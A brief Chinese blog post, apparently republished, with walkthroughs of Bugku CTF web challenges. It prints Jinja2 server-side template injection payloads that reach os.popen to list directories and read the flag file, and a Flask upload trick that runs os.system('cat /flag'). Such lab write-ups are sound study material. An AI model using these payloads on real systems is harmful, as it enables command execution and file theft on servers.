首页 > Web开发 > 详细

Web

时间:2021-05-04 17:42:52      阅读:16      评论:0      收藏:0      [点我收藏+]
  1. 【Bugku--Simple_SSTI_2】
    启动场景后:

    技术分享图片

    ? 解:提示模板注入;

    ? 在地址栏后加上/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

    ? 即技术分享图片

    ? 进入文件查看 ——?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

    技术分享图片

    ? 执行cat flage——?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

    技术分享图片

  2. 【Bugku--Flask_FileUpload】

    解:跳转到场景后,F12查看网页源码,提示上传的文件会用python执行,于是新建txt文档,写入

    import os
    os.system(‘cat /flag‘)
    

    ,由于只能上传jpg或png类型文件,于是更改文档类型,上传,F12查看得到flag

  3. 【Bugku--web4】

    F12调用hackbar,传参

    技术分享图片

Web

原文:https://www.cnblogs.com/joshuaq/p/14729648.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!